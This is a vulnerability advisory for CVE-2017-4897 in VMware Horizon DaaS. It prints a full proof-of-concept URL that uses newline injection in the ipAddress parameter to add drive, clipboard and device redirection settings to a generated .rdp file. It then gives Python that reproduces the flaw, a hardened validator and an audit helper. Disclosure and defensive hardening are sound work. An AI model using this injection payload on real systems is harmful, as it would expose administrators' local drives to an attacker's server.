
VMware Horizon DaaS - Improper IP Address Validation

Ahmad Ashraff
  • CVE(s): VMSA-2017-0002, CVE-2017-4897
  • Vendor: VMware
  • Product: Horizon DaaS Platform
  • Version(s) affected: 6.1.x
  • Fixed version: 7.0.0

A security advisory was released by the VMware Security Team on the 3rd of March 2017 in their Security Blog.

Improper IP Address Validation (CVE-2017-4897)

Horizon DaaS allows the creation of a remote desktop connection (.rdp) file through the application. This process can only be performed by a user with administrative privileges. The request looks similar to the following:

<host>/admin/getRdpByIp.action?ipAddress=<ip-address>

However, it was found that the ipAddress parameter of getRdpByIp does not properly validate the input supplied by the user. By placing newline characters (%0a) in the parameter, it is possible to inject additional settings into the generated remote desktop connection file, such as drive mapping redirections.

Example:

https://<host>/admin/getRdpByIp.action?ipAddress=<attacker's-ip-address>:3389%0aconnect%20to%20console:i:1%0aadministrative%20session:i:1%0ausername:s:Administrator%0adomain:s:.%0ascreen%20mode%20id:i:2%0ause%20multimon:i:0%0adesktopwidth:i:800%0adesktopheight:i:600%0asession%20bpp:i:32%0awinposstr:s:0,3,0,0,800,600%0acompression:i:1%0akeyboardhook:i:2%0aaudiocapturemode:i:0%0avideoplaybackmode:i:1%0aconnection%20type:i:2%0adisplayconnectionbar:i:1%0adisable%20wallpaper:i:1%0aallow%20font%20smoothing:i:0%0aallow%20desktop%20composition:i:0%0adisable%20full%20window%20drag:i:1%0adisable%20menu%20anims:i:1%0adisable%20themes:i:0%0adisable%20cursor%20setting:i:0%0abitmapcachepersistenable:i:1%0aaudiomode:i:0%0aredirectprinters:i:1%0aredirectcomports:i:1%0aredirectsmartcards:i:1%0aredirectclipboard:i:1%0aredirectposdevices:i:0%0aredirectdirectx:i:1%0adevicestoredirect:s:*%0adrivestoredirect:s:*%0aautoreconnection%20enabled:i:1%0aauthentication%20level:i:2%0aprompt%20for%20credentials:i:0%0anegotiate%20security%20layer:i:1%0aremoteapplicationmode:i:0%0aalternate%20shell:s:%0ashell%20working%20directory:s:%0agatewayhostname:s:%0agatewayusagemethod:i:4%0agatewaycredentialssource:i:4%0agatewayprofileusagemethod:i:0%0apromptcredentialonce:i:1%0ause%20edirection%20server%20name:i:0%0anull

An authenticated administrator who is manipulated into clicking the above URL will receive a remote desktop connection file. Once this file is opened, it connects to the attacker's IP address with the administrator's local drives mapped to the attacker's remote desktop server.
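The root cause is that a single request parameter is written verbatim into a line-oriented file format, so an embedded newline becomes a new setting. The following Python is an added illustration, not VMware's code and not part of the advisory: a constructed builder that reproduces the defect beside a hardened builder that validates the parameter before use, plus a small audit helper that a defender can run over generated .rdp files to flag redirection settings the endpoint never meant to emit. The function names, the fixed setting list, the redirection key set and the 192.0.2.10 sample address are assumptions made for this example.

```python
import ipaddress
import re
import urllib.parse

# Redirection settings that hand local resources (drives, clipboard, devices)
# to the remote host. Assumed list for this example; extend as needed.
REDIRECT_KEYS = {"drivestoredirect", "devicestoredirect", "redirectclipboard",
                 "redirectprinters", "redirectcomports", "redirectsmartcards"}

# IPv4 literal with an optional :port. Hostnames and IPv6 are deliberately
# rejected; the endpoint in question takes an IP address.
IPV4_WITH_PORT = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?")
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def build_rdp_vulnerable(ip_address: str) -> str:
    """Constructed 'before' version: the decoded parameter is written verbatim,
    so newlines inside it turn into additional .rdp settings."""
    return f"full address:s:{ip_address}\r\nscreen mode id:i:2\r\n"


def parse_ip_address(value: str) -> tuple:
    """Strict parser for the ipAddress parameter. Raises ValueError on control
    characters (CR/LF included), non-IPv4 input, bad octets or bad ports."""
    if CONTROL_CHARS.search(value):
        raise ValueError("control character in ipAddress")
    match = IPV4_WITH_PORT.fullmatch(value)
    if match is None:
        raise ValueError("ipAddress is not an IPv4 literal with optional port")
    ip = ipaddress.IPv4Address(match.group(1))  # rejects octets above 255
    port = int(match.group(2) or 3389)
    if not 1 <= port <= 65535:
        raise ValueError("port out of range")
    return str(ip), port


def build_rdp_hardened(ip_address: str) -> str:
    """Hardened version: validate first, then emit only fixed settings built
    from the parsed components, never from the raw parameter."""
    ip, port = parse_ip_address(ip_address)
    lines = [f"full address:s:{ip}:{port}", "screen mode id:i:2"]
    return "\r\n".join(lines) + "\r\n"


def parse_rdp(text: str) -> dict:
    """Parse 'key:type:value' lines of an .rdp file into {key: (type, value)}.
    Later duplicates overwrite earlier ones."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":", 2)
        if len(parts) != 3:
            continue
        key, kind, value = parts
        settings[key.strip().lower()] = (kind.strip(), value)
    return settings


def unexpected_redirections(text: str) -> set:
    """Audit helper: return redirection keys present in a generated file with a
    permissive value (anything other than empty or 0)."""
    settings = parse_rdp(text)
    return {key for key in REDIRECT_KEYS & set(settings)
            if settings[key][1].strip() not in ("", "0")}


# Constructed parameter values in the shape of the advisory's example; the
# documentation address 192.0.2.10 stands in for a real host.
MALICIOUS_PARAM = urllib.parse.unquote(
    "192.0.2.10:3389%0adrivestoredirect:s:*%0aredirectclipboard:i:1")
BENIGN_PARAM = "192.0.2.10:3389"

if __name__ == "__main__":
    print("injected:", unexpected_redirections(build_rdp_vulnerable(MALICIOUS_PARAM)))
    print(build_rdp_hardened(BENIGN_PARAM))
    try:
        build_rdp_hardened(MALICIOUS_PARAM)
    except ValueError as exc:
        print("rejected:", exc)
```

The hardened builder never interpolates the raw parameter: it parses the address into components, rejects anything containing control characters, and rebuilds the `full address` line from the parsed values. The audit helper is useful on the response side as well, for example as a regression test that generated files never carry a permissive `drivestoredirect` or `redirectclipboard` value.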

Disclaimer

The information in this article is provided for research and educational purposes only. Aura Information Security does not accept any liability in any form for any direct or indirect damages resulting from the use of or reliance on the information contained in this article.